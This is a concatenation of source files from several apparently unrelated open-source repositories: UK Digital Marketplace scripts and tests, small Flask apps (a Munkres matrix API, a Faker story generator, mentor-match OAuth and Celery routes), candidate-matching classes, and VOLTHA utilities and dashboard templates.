if not os.path.exists(output_dir):
os.mkdir(output_dir)
page_path = os.path.join(output_dir, '{}-{}.html'.format(supplier_id, descriptive_filename_part))
with io.open(page_path, 'w+', encoding='UTF-8') as htmlfile:
htmlfile.write(html)
def render_html_for_successful_suppliers(rows, framework, template_dir, output_dir):
template_path = os.path.join(template_dir, 'framework-agreement-signature-page.html')
template_css_path = os.path.join(template_dir, 'framework-agreement-signature-page.css')
for data in rows:
if data['pass_fail'] in ('fail', 'discretionary'):
continue
data['framework'] = framework
data['awardedLots'] = [lot for lot in framework['frameworkAgreementDetails']['lotOrder'] if int(data[lot]) > 0]
data['includeCountersignature'] = False
html = render_html(template_path, data)
save_page(html, data['supplier_id'], output_dir, "signature-page")
shutil.copyfile(template_css_path, os.path.join(output_dir, 'framework-agreement-signature-page.css'))
def render_html_for_suppliers_awaiting_countersignature(rows, framework, template_dir, output_dir):
template_path = os.path.join(template_dir, 'framework-agreement-signature-page.html')
template_css_path = os.path.join(template_dir, 'framework-agreement-signature-page.css')
template_countersignature_path = os.path.join(template_dir, 'framework-agreement-countersignature.png')
for data in rows:
if data['pass_fail'] == 'fail' or data['countersigned_path'] or not data['countersigned_at']:
logger.info("SKIPPING {}: pass_fail={} countersigned_at={} countersigned_path={}".format(
data['supplier_id'],
data['pass_fail'],
data['countersigned_at'],
data['countersigned_path'])
)
continue
data['framework'] = framework
data['awardedLots'] = [lot for lot in framework['frameworkAgreementDetails']['lotOrder'] if int(data[lot]) > 0]
data['countersigned_at'] = datetime.strptime(
data['countersigned_at'], '%Y-%m-%dT%H:%M:%S.%fZ'
).strftime('%d %B %Y')
data['includeCountersignature'] = True
html = render_html(template_path, data)
save_page(html, data['supplier_id'], output_dir, "agreement-countersignature")
shutil.copyfile(template_css_path, os.path.join(output_dir, 'framework-agreement-signature-page.css'))
shutil.copyfile(
template_countersignature_path,
os.path.join(output_dir, 'framework-agreement-countersignature.png')
)
def render_pdf_for_each_html_page(html_pages, html_dir, pdf_dir):
html_dir = os.path.abspath(html_dir)
pdf_dir = os.path.abspath(pdf_dir)
ok = True
if not os.path.exists(pdf_dir):
os.mkdir(pdf_dir)
for index, html_page in enumerate(html_pages):
html_path = os.path.join(html_dir, html_page)
pdf_path = '{}'.format(re.sub(r'\.html$', '.pdf', html_path))
pdf_path = '{}'.format(re.sub(html_dir, pdf_dir, pdf_path))
exit_code = subprocess.call(['wkhtmltopdf', 'file://{}'.format(html_path), pdf_path])
if exit_code > 0:
logger.error("ERROR {} on {}".format(exit_code, html_page))
ok = False
return ok
```
#### File: dmscripts/helpers/user_helpers.py
```python
import random
def get_supplier_id(api_client, framework, lot):
services = [
s for s in api_client.find_services(framework=framework, lot=lot)['services']
if s['status'] in ['published']
]
if not services:
raise RuntimeError(
"No live services found for '{}' framework{}".format(
framework,
" and '{}' lot".format(lot) if lot else "",
)
)
return random.choice(services)['supplierId']
def get_random_buyer_with_brief(api_client, framework, lot):
briefs = api_client.find_briefs(
framework=framework,
lot=lot,
status="live,cancelled,unsuccessful,closed,awarded",
with_users=True,
)["briefs"]
if not briefs:
raise RuntimeError(
"No users with published briefs found for '{}' framework{}".format(
framework,
" and '{}' lot".format(lot) if lot else "",
)
)
brief = random.choice(briefs)
return random.choice(brief["users"])
def get_random_user(api_client, role, supplier_id=None):
return random.choice([
u for u in api_client.find_users(role=role, supplier_id=supplier_id)['users']
if u['active'] and not u['locked']
])
```
#### File: digitalmarketplace-scripts/dmscripts/send_dos_opportunities_email.py
```python
from datetime import datetime, date, timedelta
from dmscripts.helpers.html_helpers import render_html
from dmscripts.helpers import logging_helpers
from dmscripts.helpers.logging_helpers import logging
from dmutils.formats import DATETIME_FORMAT, DISPLAY_DATE_FORMAT
logger = logging_helpers.configure_logger({'dmapiclient': logging.INFO})
def get_live_briefs_between_two_dates(data_api_client, lot_slug, start_date, end_date, framework_slug):
"""Get all briefs for a lot which were published between 2 dates."""
return [
brief for brief in data_api_client.find_briefs_iter(
status="live", lot=lot_slug, human=True, framework=framework_slug
)
if datetime.strptime(brief['publishedAt'], DATETIME_FORMAT).date() >= start_date
and datetime.strptime(brief['publishedAt'], DATETIME_FORMAT).date() <= end_date
]
def get_campaign_data(lot_name, list_id, framework_name):
return {
"type": "regular",
"recipients": {
"list_id": list_id,
},
"settings": {
"subject_line": "New opportunities for {0}: {1}".format(
lot_name, framework_name
),
"title": "DOS Suppliers: {0} [{1}]".format(lot_name, datetime.now().strftime("%d %B")),
"from_name": "Digital Marketplace Team",
"reply_to": "<EMAIL>",
"use_conversation": False,
"authenticate": True,
"auto_footer": False,
"inline_css": False,
"auto_tweet": False,
"fb_comments": False
},
"tracking": {
"opens": True,
"html_clicks": True,
"text_clicks": False,
"goal_tracking": False,
"ecomm360": False
}
}
def get_html_content(briefs, number_of_days):
start_date = date.today() - timedelta(days=number_of_days)
for brief in briefs:
brief.update(
{"applicationsClosedAtDateTime": datetime.strptime(brief["applicationsClosedAt"], DATETIME_FORMAT)}
)
html_content = render_html("templates/email/dos_opportunities.html", data={
"briefs": briefs,
"today": datetime.today(),
"display_date_format": DISPLAY_DATE_FORMAT,
"number_of_days": number_of_days,
"start_date": start_date
})
return {"html": html_content}
def main(data_api_client, mailchimp_client, lot_data, number_of_days, framework_slug):
logger.info(
"Begin process to send DOS notification emails for '{0}' lot".format(lot_data["lot_slug"]),
extra={"lot_data": lot_data, "number_of_days": number_of_days}
)
start_date = date.today() - timedelta(days=number_of_days)
end_date = date.today() - timedelta(days=1)
live_briefs = get_live_briefs_between_two_dates(
data_api_client, lot_data["lot_slug"], start_date, end_date, framework_slug
)
if not live_briefs:
logger.info(
"No new briefs found for '{0}' lot".format(lot_data["lot_slug"]),
extra={"number_of_days": number_of_days}
)
return True
logger.info(
"{0} new briefs found for '{1}' lot".format(len(live_briefs), lot_data["lot_slug"])
)
campaign_data = get_campaign_data(lot_data["lot_name"], lot_data["list_id"], live_briefs[0]['frameworkName'])
logger.info(
"Creating campaign for '{0}' lot".format(lot_data["lot_slug"])
)
campaign_id = mailchimp_client.create_campaign(campaign_data)
if not campaign_id:
return False
content_data = get_html_content(live_briefs, number_of_days)
logger.info(
"Setting campaign data for '{0}' lot and '{1}' campaign id".format(lot_data["lot_slug"], campaign_id)
)
if not mailchimp_client.set_campaign_content(campaign_id, content_data):
return False
logger.info(
"Sending campaign for '{0}' lot and '{1}' campaign id".format(lot_data["lot_slug"], campaign_id)
)
if not mailchimp_client.send_campaign(campaign_id):
return False
return True
```
#### File: digitalmarketplace-scripts/scripts/export-dos-specialists.py
```python
import sys
sys.path.insert(0, '.')
from docopt import docopt
from dmscripts.helpers.csv_helpers import make_fields_from_content_questions, write_csv_with_make_row
from dmscripts.helpers.auth_helpers import get_auth_token
from dmscripts.helpers.framework_helpers import find_suppliers_with_details_and_draft_services
from dmapiclient import DataAPIClient
from dmcontent.content_loader import ContentLoader
from dmscripts.helpers import logging_helpers
from dmscripts.helpers.logging_helpers import logging
from dmutils.env_helpers import get_api_endpoint_from_stage
logger = logging_helpers.configure_logger({"dmapiclient": logging.WARNING})
def find_all_specialists(client):
return find_suppliers_with_details_and_draft_services(client,
FRAMEWORK_SLUG,
lot="digital-specialists",
statuses="submitted"
)
def make_row(content_manifest):
section = content_manifest.get_section("individual-specialist-roles")
specialist_roles = list(get_specialist_roles(section))
def inner(record):
row = [
("supplier_id", record["supplier_id"]),
("supplier_name", record['supplier']['name']),
("supplier_declaration_name", record['declaration'].get('supplierRegisteredName', '')),
("status", "PASSED" if record["onFramework"] else "FAILED"),
]
return row + make_fields_from_content_questions(specialist_roles, record)
return inner
def get_specialist_roles(section):
return [
question
for outer_question in section.questions
for question in outer_question.questions
]
if __name__ == '__main__':
arguments = docopt(__doc__)
STAGE = arguments['<stage>']
CONTENT_PATH = arguments['<content_path>']
FRAMEWORK_SLUG = arguments['<framework_slug>']
client = DataAPIClient(get_api_endpoint_from_stage(STAGE), get_auth_token('api', STAGE))
content_loader = ContentLoader(CONTENT_PATH)
content_loader.load_manifest(FRAMEWORK_SLUG, "services", "edit_submission")
content_manifest = content_loader.get_manifest(FRAMEWORK_SLUG, "edit_submission")
suppliers = find_all_specialists(client)
write_csv_with_make_row(
suppliers,
make_row(content_manifest),
"output/{}-specialists.csv".format(FRAMEWORK_SLUG)
)
```
#### File: digitalmarketplace-scripts/scripts/snapshot-framework-stats.py
```python
from docopt import docopt
import logging
import sys
import dmapiclient
from dmapiclient.audit import AuditTypes
sys.path.insert(0, '.')
from dmscripts.helpers.auth_helpers import get_auth_token
from dmutils.env_helpers import get_api_endpoint_from_stage
logger = logging.getLogger('script')
logging.basicConfig(level=logging.INFO)
def get_stats(data_client, framework_slug):
return data_client.get_framework_stats(framework_slug)
def snapshot_framework_stats(api_endpoint, api_token, framework_slug):
data_client = dmapiclient.DataAPIClient(api_endpoint, api_token)
stats = get_stats(data_client, framework_slug)
data_client.create_audit_event(
AuditTypes.snapshot_framework_stats,
data=stats,
object_type='frameworks',
object_id=framework_slug
)
logger.info("Framework stats snapshot saved")
if __name__ == '__main__':
arguments = docopt(__doc__)
snapshot_framework_stats(
get_api_endpoint_from_stage(arguments['<stage>']),
get_auth_token('api', arguments['<stage>']),
arguments['<framework_slug>'],
)
```
#### File: digitalmarketplace-scripts/tests/conftest.py
```python
import json
import os
import pytest
from mock import Mock
import requests_mock
FIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixtures')
@pytest.fixture
def mock_data_client():
"""Mock data client for use in tests. These can be overwritten in individual tests."""
mock_data_client = Mock()
mock_data_client.get_framework.return_value = dict(frameworks=dict(lots=[
{'slug': 'test_lot_slug_1'},
{'slug': 'test_lot_slug_2'},
]))
mock_data_client.find_draft_services_iter.return_value = {}
mock_data_client.export_users.return_value = {
'users': [
{'supplier_id': 12345, 'application_status': 'application', 'extraneous_field': 'foo'},
{'supplier_id': 23456, 'application_status': 'no_application', 'extraneous_field': 'foo'},
{'supplier_id': 123, 'application_status': 'application', 'extraneous_field': 'foo'},
{'supplier_id': 456, 'application_status': 'application', 'extraneous_field': 'foo'},
{'supplier_id': 789, 'application_status': 'no_application', 'extraneous_field': 'foo'},
{'supplier_id': 101, 'application_status': 'no_application', 'extraneous_field': 'foo'}
]
}
with open(os.path.join(FIXTURES_DIR, 'test_supplier_frameworks_response.json')) as supplier_frameworks_response:
mock_data_client.find_framework_suppliers.return_value = json.loads(supplier_frameworks_response.read())
return mock_data_client
@pytest.yield_fixture
def rmock():
with requests_mock.mock() as rmock:
real_register_uri = rmock.register_uri
def register_uri_with_complete_qs(*args, **kwargs):
if 'complete_qs' not in kwargs:
kwargs['complete_qs'] = True
return real_register_uri(*args, **kwargs)
rmock.register_uri = register_uri_with_complete_qs
yield rmock
```
#### File: tests/helpers/test_brief_data_helpers.py
```python
import mock
import datetime
import pytest
from dmscripts.helpers import brief_data_helpers
class TestGetBriefsClosedOnDate:
def test_get_briefs_closed_on_date_filters_by_date_closed(self):
api_client = mock.Mock()
api_client.find_briefs_iter.return_value = iter([
{"applicationsClosedAt": "2016-09-04T23:59:59.000000Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T00:00:00.000000Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T08:29:39.000001Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T23:59:59.000000Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-06T00:00:00.000000Z", "status": "closed"},
])
assert brief_data_helpers.get_briefs_closed_on_date(api_client, datetime.date(2016, 9, 5)) == [
{"applicationsClosedAt": "2016-09-05T00:00:00.000000Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T08:29:39.000001Z", "status": "closed"},
{"applicationsClosedAt": "2016-09-05T23:59:59.000000Z", "status": "closed"},
]
def test_get_briefs_closed_on_date_throws_error_for_briefs_without_application_closed_at(self):
api_client = mock.Mock()
api_client.find_briefs_iter.return_value = iter([
{"applicationsClosedAt": "2016-09-05T23:59:59.000000Z", "status": "closed"},
{"status": "closed"}
])
with pytest.raises(KeyError):
brief_data_helpers.get_briefs_closed_on_date(api_client, datetime.date(2016, 9, 5))
``` |
{
"source": "jonodrew/graduate-rotator",
"score": 3
} |
#### File: app/munkres_api/routes.py
```python
from app.munkres_api import munkres_bp
from munkres import Munkres
import json
from flask import request, jsonify
import sys
@munkres_bp.route("/process-matrix", methods=["POST"])
def process_matrix():
"""
This api takes a list of lists and returns a list of coordinates. The list of list represents an n x m matrix of numbers. This function finds the path
through the matrix that returns the highest value
:return:
"""
matrix = json.loads(request.data).get("matrix")
cost_matrix = [[sys.maxsize - col for col in row] for row in matrix]
m = Munkres()
indexes = m.compute(cost_matrix)
return jsonify(indexes)
``` |
{
"source": "jonodrew/matchex",
"score": 3
} |
#### File: jonodrew/matchex/classes.py
```python
class Candidate(object):
def __init__(self, name, priorDepartment, priorAnchor, priorSkill1,
priorSkill2, priorLocation, XX, wantedAnchor, wantedSkill1,
wantedAnchor2,wantedSkill2,wantedComp1,wantedComp2,wantedComp3,wantedDept1,
wantedDept2,wantedDept3,wantedDept4,wantedDept5,wantedDept6,wantedDept7,
wantedDept8,wantedDept9,wantedDept10,secondment,wantedLocation,restrictions,
security,cohort):
self.name = name
self.priorDepartment = priorDepartment
self.priorAnchor = priorAnchor
self.priorSkill1 = priorSkill1
self.priorSkill2 = priorSkill2
self.priorLocation = priorLocation
self.XX = XX
self.wantedAnchor = wantedAnchor
self.wantedSkill1 = wantedSkill1
self.wantedAnchor2 = wantedAnchor2
self.wantedSkill2 = wantedSkill2
self.wantedComp1 = wantedComp1
self.wantedComp2 = wantedComp2
self.wantedComp3 = wantedComp3
self.wantedDept1 = wantedDept1
self.wantedDept2 = wantedDept2
self.wantedDept3 = wantedDept3
self.wantedDept4 = wantedDept4
self.wantedDept5 = wantedDept5
self.wantedDept6 = wantedDept6
self.wantedDept7 = wantedDept7
self.wantedDept8 = wantedDept8
self.wantedDept9 = wantedDept9
self.wantedDept10 = wantedDept10
self.secondment = secondment
self.wantedLocation = wantedLocation
self.restrictions = restrictions
self.security = security
self.cohort = cohort
class Posting(object):
def __init__(self, code, department, anchor, skill1, skill2, location, name,
competency1, competency2, competency3, security, cohort):
self.code = code
self.department = department
self.anchor = anchor
self.skill1 = skill1
self.skill2 = skill2
self.location = location
self.name = name
self.competency1 = competency1
self.competency2 = competency2
self.competency3 = competency3
self.security = security
self.cohort = cohort
class Weighting(object):
def __init__(self,department,anchor,skill,location,competency,restriction,
previous_location):
self.department = department
self.anchor = anchor
self.skill = skill
self.location = location
self.competency = competency
self.previous_location = previous_location
class ReturnValue(object):
def __init__(self, y0, y1, y2):
self.y0 = y0
self.y1 = y1
self.y2 = y2
```
#### File: jonodrew/matchex/test1.py
```python
def test(a,b):
for i in range(len(a)):
if a[i] == b[i]:
score += 1
else:
score = 0
print(score)
``` |
{
"source": "jonodrew/mentor-match",
"score": 3
} |
#### File: app/auth/routes.py
```python
import os
import flask
from app.auth import auth_bp
from flask import redirect, url_for
import google_auth_oauthlib.flow # type: ignore
CONFIG = {
"web": {
"client_id": os.environ.get("GOOGLE_CLIENT_ID"),
"project_id": "mentor-match-333011",
"auth_uri": "https://accounts.google.com/o/oauth2/auth",
"token_uri": "https://oauth2.googleapis.com/token",
"auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
"client_secret": os.environ.get("GOOGLE_CLIENT_SECRET"),
}
}
@auth_bp.route("/login", methods=["GET", "POST"])
def authorize():
flow = google_auth_oauthlib.flow.Flow.from_client_config(
client_config=CONFIG,
scopes=["https://www.googleapis.com/auth/drive"],
)
flow.redirect_uri = url_for("auth.callback", _external=True)
authorization_url, state = flow.authorization_url(
access_type="offline", include_granted_scopes="true"
)
flask.session["state"] = state
return redirect(authorization_url)
@auth_bp.route("/callback", methods=["GET"])
def callback():
state = flask.session["state"]
flow = google_auth_oauthlib.flow.Flow.from_client_config(
client_config=CONFIG,
scopes=["https://www.googleapis.com/auth/drive"],
state=state,
)
flow.redirect_uri = flask.url_for("auth.callback", _external=True)
authorization_response = flask.request.url
flow.fetch_token(authorization_response=authorization_response)
credentials = flow.credentials
flask.session["credentials"] = {
"token": credentials.token,
"refresh_token": credentials.refresh_token,
"token_uri": credentials.token_uri,
"client_id": credentials.client_id,
"client_secret": credentials.client_secret,
"scopes": credentials.scopes,
}
return redirect(url_for("main.upload"))
```
#### File: app/main/routes.py
```python
from celery.result import AsyncResult
from flask import render_template, request
from app.main import main_bp
from app.tasks import create_task
@main_bp.route("/", methods=["GET"])
def index():
return render_template("index.html", title="Hello World!")
@main_bp.route("/upload", methods=["GET", "POST"])
def upload():
if request.method == "GET":
return render_template("input.html")
@main_bp.route("/tasks", methods=["POST"])
def run_task():
content = request.json
task_type = content["type"]
task = create_task.delay(int(task_type))
return {"task_id": task.id}, 202
@main_bp.route("/tasks/<task_id>", methods=["GET"])
def get_status(task_id):
task_result = AsyncResult(task_id)
result = {
"task_id": task_id,
"task_status": task_result.status,
"task_result": task_result.result,
}
return result, 200
``` |
{
"source": "jonodrew/story_generator_p",
"score": 3
} |
#### File: jonodrew/story_generator_p/story.py
```python
from flask import Flask
from faker import Faker
from faker.providers import company, job, person, geo
app = Flask(__name__)
@app.route('/')
def story():
fake = Faker()
mystory = "<html><body><p>In a(n) " + fake.company()
mystory = mystory + " a young "
mystory = mystory + fake.language_name()
mystory = mystory + " stumbles across a(n) "
mystory = mystory + fake.domain_word()
mystory = mystory + " which spurs him into conflict with "
mystory = mystory + fake.name()
mystory = mystory + " an " + fake.catch_phrase()
mystory = mystory + " with the help of a(n) "
mystory = mystory + fake.job()
mystory = mystory + " and her "
mystory = mystory + fake.file_name()
mystory = mystory + " culminating in a struggle in "
mystory = mystory + fake.company()
mystory = mystory + " where someone shouts "
mystory = mystory + fake.bs()
mystory = mystory + " </p></body></html>"
return mystory
``` |
{
"source": "jonogreenz/py-pushover-open-client",
"score": 3
} |
#### File: py-pushover-open-client/examples/client_callback.py
```python
from pushover_open_client import Client
def messageCallback(messageList):
# Prcoess/do work with messageList!
if(messageList):
for message in messageList:
# Do work with message here!
# Make sure to acknowledge messages with priority >= 2
if(message.priority >= 2):
if(message.acked != 1):
client.acknowledgeEmergency(message.receipt)
# Make sure you delete messages that you recieve!
client.deleteMessages(messageList[-1].id)
# Setups with a device configuration
client = Client("example_device.cfg")
# Get any messages sent before the client has started
messageList = client.getOutstandingMessages()
# Do work with outstanding messages
# Make sure you delete messages that you recieve!
if(messageList):
client.deleteMessages(messageList[-1].id)
# Pass our function as a parameter, this will run 'forever'
client.getWebSocketMessages(messageCallback)
# Can optionally continue doing other work here without the need
# to poll the websocket
``` |
{
"source": "jonohart/voltha",
"score": 3
} |
#### File: common/utils/deferred_utils.py
```python
from twisted.internet import reactor
from twisted.internet.defer import Deferred
from twisted.internet.error import AlreadyCalled
class TimeOutError(Exception): pass
class DeferredWithTimeout(Deferred):
"""
Deferred with a timeout. If neither the callback nor the errback method
is not called within the given time, the deferred's errback will be called
with a TimeOutError() exception.
All other uses are the same as of Deferred().
"""
def __init__(self, timeout=1.0):
Deferred.__init__(self)
self._timeout = timeout
self.timer = reactor.callLater(timeout, self.timed_out)
def timed_out(self):
self.errback(
TimeOutError('timed out after {} seconds'.format(self._timeout)))
def callback(self, result):
self._cancel_timer()
return Deferred.callback(self, result)
def errback(self, fail):
self._cancel_timer()
return Deferred.errback(self, fail)
def cancel(self):
self._cancel_timer()
return Deferred.cancel(self)
def _cancel_timer(self):
try:
self.timer.cancel()
except AlreadyCalled:
pass
```
#### File: common/utils/indexpool.py
```python
from bitstring import BitArray
import structlog
log = structlog.get_logger()
class IndexPool(object):
def __init__(self, max_entries, offset):
self.max_entries = max_entries
self.offset = offset
self.indices = BitArray(self.max_entries)
def get_next(self):
try:
_pos = self.indices.find('0b0')
self.indices.set(1, _pos)
return self.offset + _pos[0]
except IndexError:
log.info("exception-fail-to-allocate-id-all-bits-in-use")
return None
def allocate(self, index):
try:
_pos = index - self.offset
if not (0 <= _pos < self.max_entries):
log.info("{}-out-of-range".format(index))
return None
if self.indices[_pos]:
log.info("{}-is-already-allocated".format(index))
return None
self.indices.set(1, _pos)
return index
except IndexError:
return None
def release(self, index):
index -= self.offset
_pos = (index,)
try:
self.indices.set(0, _pos)
except IndexError:
log.info("bit-position-{}-out-of-range".format(index))
#index or multiple indices to set all of them to 1 - need to be a tuple
def pre_allocate(self, index):
if(isinstance(index, tuple)):
_lst = list(index)
for i in range(len(_lst)):
_lst[i] -= self.offset
index = tuple(_lst)
self.indices.set(1, index)
```
#### File: common/utils/json_format.py
```python
from google.protobuf import json_format
class _PatchedPrinter(json_format._Printer):
def __init__(self, including_default_value_fields=False,
preserving_proto_field_name=False,
strict_any_handling=False):
super(_PatchedPrinter, self).__init__(including_default_value_fields,
preserving_proto_field_name)
self.strict_any_handling = strict_any_handling
def _BestEffortAnyMessageToJsonObject(self, msg):
try:
res = self._AnyMessageToJsonObject(msg)
except TypeError:
res = self._RegularMessageToJsonObject(msg, {})
return res
def MessageToDict(message,
including_default_value_fields=False,
preserving_proto_field_name=False,
strict_any_handling=False):
"""Converts protobuf message to a JSON dictionary.
Args:
message: The protocol buffers message instance to serialize.
including_default_value_fields: If True, singular primitive fields,
repeated fields, and map fields will always be serialized. If
False, only serialize non-empty fields. Singular message fields
and oneof fields are not affected by this option.
preserving_proto_field_name: If True, use the original proto field
names as defined in the .proto file. If False, convert the field
names to lowerCamelCase.
strict_any_handling: If True, converion will error out (like in the
original method) if an Any field with value for which the Any type
is not loaded is encountered. If False, the conversion will leave
the field un-packed, but otherwise will continue.
Returns:
A dict representation of the JSON formatted protocol buffer message.
"""
printer = _PatchedPrinter(including_default_value_fields,
preserving_proto_field_name,
strict_any_handling=strict_any_handling)
# pylint: disable=protected-access
return printer._MessageToJsonObject(message)
def MessageToJson(message,
including_default_value_fields=False,
preserving_proto_field_name=False,
strict_any_handling=False):
"""Converts protobuf message to JSON format.
Args:
message: The protocol buffers message instance to serialize.
including_default_value_fields: If True, singular primitive fields,
repeated fields, and map fields will always be serialized. If
False, only serialize non-empty fields. Singular message fields
and oneof fields are not affected by this option.
preserving_proto_field_name: If True, use the original proto field
names as defined in the .proto file. If False, convert the field
names to lowerCamelCase.
strict_any_handling: If True, converion will error out (like in the
original method) if an Any field with value for which the Any type
is not loaded is encountered. If False, the conversion will leave
the field un-packed, but otherwise will continue.
Returns:
A string containing the JSON formatted protocol buffer message.
"""
printer = _PatchedPrinter(including_default_value_fields,
preserving_proto_field_name,
strict_any_handling=strict_any_handling)
return printer.ToJsonString(message)
json_format._WKTJSONMETHODS['google.protobuf.Any'] = [
'_BestEffortAnyMessageToJsonObject',
'_ConvertAnyMessage'
]
json_format._Printer._BestEffortAnyMessageToJsonObject = \
json_format._Printer._AnyMessageToJsonObject
```
#### File: voltha/dashd/dash_template.py
```python
from structlog import get_logger
from twisted.internet.defer import DeferredList, inlineCallbacks
import requests
import sys
#
# This file contains the dashboard template information. It gets pulled into
# the dashd module and used to createt he dashboards. The other option would
# be to put each of these in an individual text file and read them in when the
# dashd process starts. There isn't much advantage to doing so at this time.
#
# TODO: The creation of a template from Grafana is currently incomplete.
log = get_logger()
class DashTemplate(object):
def __init__(self, grafana_url):
self.grafana_url = grafana_url
self.rowSelector = '%port%' # Not currently used
self.rows = [
dict(
title = "%port% packet statistics"
)
]
self.panels = [
dict(
title = "%port% Packet Receive Statistics",
rx_64_pkts = \
("alias(perSecond(voltha.%device%.%deviceId%.%port%.rx_64_pkts), "
"'64b pkts/sec')"
),
rx_65_127_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_65_127_pkts), "
" '65-127b pkts/sec')"
),
rx_128_255_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_128_255_pkts), "
"'128-255b pkts/sec')"
),
rx_256_511_pkts = \
("alias(perSecond"
"(voltha.%device%.%deviceId%.%port%.rx_256_511_pkts), "
"'256-511b pkts/sec')"
),
rx_512_1023_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_512_1023_pkts), "
"'512-1023b pkts/sec')"
),
rx_1024_1518_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_1024_1518_pkts), "
"'1024-1518b pkts/sec')"
),
rx_1519_9k_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.rx_1519_9k_pkts), "
"'1519b-9kb pkts/sec')"
)
),
dict(
title = "%port% Packet Send Statistics",
tx_64_pkts = \
("alias(perSecond(voltha.%device%.%deviceId%.%port%.tx_64_pkts), "
"'64b pkts/sec')"
),
tx_65_127_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_65_127_pkts), "
"'65-127b pkts/sec')"
),
tx_128_255_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_128_255_pkts), "
"'128-255b pkts/sec')"
),
tx_256_511_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_256_511_pkts), "
"'256-511b pkts/sec')"
),
tx_512_1023_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_512_1023_pkts), "
"'512-1023b pkts/sec')"
),
tx_1024_1518_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_1024_1518_pkts), "
"'1024-1518b pkts/sec')"
),
tx_1519_9k_pkts = \
("alias(perSecond("
"voltha.%device%.%deviceId%.%port%.tx_1519_9k_pkts), "
"'1519b-9kb pkts/sec')"
)
)
]
self.dashRow = '''
{
"collapse": false,
"editable": true,
"height": "250px",
"title": "Row",
"panels": []
}
'''
self.dashTarget = '''
{
"refId": "",
"target": ""
}
'''
self.dashPanel = '''
{
"aliasColors": {},
"bars": false,
"datasource": "Voltha Stats",
"editable": true,
"error": false,
"fill": 0,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 1,
"isNew": true,
"legend": {
"avg": false,
"current": false,
"max": false,
"min": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 5,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"span": 6,
"stack": false,
"steppedLine": false,
"targets": [
],
"timeFrom": null,
"timeShift": null,
"title": "",
"tooltip": {
"msResolution": true,
"shared": true,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
}
'''
self.dashBoard = '''
{
"dashboard":{
"annotations": {
"list": []
},
"refresh": "1m",
"editable": true,
"hideControls": false,
"id": null,
"overwrite": true,
"links": [],
"rows": [
],
"schemaVersion": 12,
"sharedCrosshair": false,
"style": "dark",
"tags": [],
"templating": {
"list": []
},
"time": {
"from": "now-30m",
"to": "now"
},
"timepicker": {
"refresh_intervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
],
"time_options": [
"5m",
"15m",
"1h",
"6h",
"12h",
"24h",
"2d",
"7d",
"30d"
]
},
"timezone": "browser",
"title": "",
"version": 0
}
}
'''
#TODO This functionality is a work in progress and needs to be completed.
def apply_template(self, tplt_info):
# The tplt_info is the record returned by Grafana as a result of a
# search request. This includes the id, title, uri, and other fields
# of no interest to us. The URI provides the key to access the
# dashboard definition from which we'll create a template.
try:
r = requests.get(self.grafana_url + "/dashboards/" + \
tplt_info['uri'])
db = r.json()
# We don't need all the meta-data so just keep the dashboard
# definition
db = db['dashboard']
# We need to null out the id to create new dashboards with the
# template.
db['id'] = None
# Extract the rows and empty them from the template
rows = db['rows']
db['rows']=[]
# Determine if the rows are wildcarded or fixed, if wildcarded they
# need to map to the port which will create one row per port if
# they're not wildcarded then the title will be used as the port id
# and the same fixed number of rows will be used for every
# dashboard.
# Wildcarding implies a single row so check that first.
if len(rows) == 1:
# We might have wildcarding, search for it in the row titile
match = re.search(r'%port%',rows[0]['title'])
if match:
# Yes there is a wildcard, flag it
log.info("Wildcard found in template row") #debug
else:
log.info("No wildcard found in template row") #debug
else:
# We don't have wildcarding
log.info("No wildcard possible in multi-row template") #debug
except:
e = sys.exc_info()
print("ERROR: ", e)
```
#### File: voltha/ofagent/connection_mgr.py
```python
import os
import sys
from twisted.internet import reactor
from twisted.internet.defer import Deferred, inlineCallbacks, returnValue
from common.utils.asleep import asleep
from common.utils.consulhelpers import get_endpoint_from_consul
from structlog import get_logger
import grpc
from grpc import StatusCode
from grpc._channel import _Rendezvous
from ofagent.protos import third_party
from protos import voltha_pb2
from protos.voltha_pb2 import OfAgentSubscriber
from grpc_client import GrpcClient
from agent import Agent
from google.protobuf.empty_pb2 import Empty
from common.utils.dockerhelpers import get_my_containers_name
log = get_logger()
# _ = third_party
class ConnectionManager(object):
def __init__(self, consul_endpoint, vcore_endpoint, controller_endpoints,
instance_id,
enable_tls=False, key_file=None, cert_file=None,
vcore_retry_interval=0.5, devices_refresh_interval=5,
subscription_refresh_interval=5):
log.info('init-connection-manager')
log.info('list-of-controllers', controller_endpoints=controller_endpoints)
self.controller_endpoints = controller_endpoints
self.consul_endpoint = consul_endpoint
self.vcore_endpoint = vcore_endpoint
self.instance_id = instance_id
self.enable_tls = enable_tls
self.key_file = key_file
self.cert_file = cert_file
self.channel = None
self.grpc_client = None # single, shared gRPC client to vcore
self.agent_map = {} # (datapath_id, controller_endpoint) -> Agent()
self.device_id_to_datapath_id_map = {}
